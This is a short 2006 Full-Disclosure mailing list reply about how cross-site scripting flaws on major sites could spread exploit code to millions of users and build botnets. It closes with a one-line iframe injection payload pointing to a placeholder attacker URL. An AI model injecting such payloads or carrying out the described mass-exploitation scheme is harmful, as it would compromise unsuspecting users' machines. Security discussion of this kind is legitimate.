[Full-disclosure] Do world's famous companies take care of theirsecurity?

Morning Wood se_cur_ity at hotmail.com
Mon Jul 31 19:45:45 BST 2006


> Does anybody happen to realize that XSS vulnerabilities make it simpler to
> leverage other vulnerabilities?  I mean, credential stealing is only the
> beginning.  Try loading WMF/JPEG/DCOM/AJAX/etc exploit code using an XSS
> vulnerability on PayPal/Yahoo/Amazon/etc, sending the link off to millions
> of people, and receiving several thousand bots to your IRC channel.


yes! all pray to <iframe src=http://HAXOR-URL/EXPLOIT></iframe>




Full-Disclosure is hosted and sponsored by Secunia.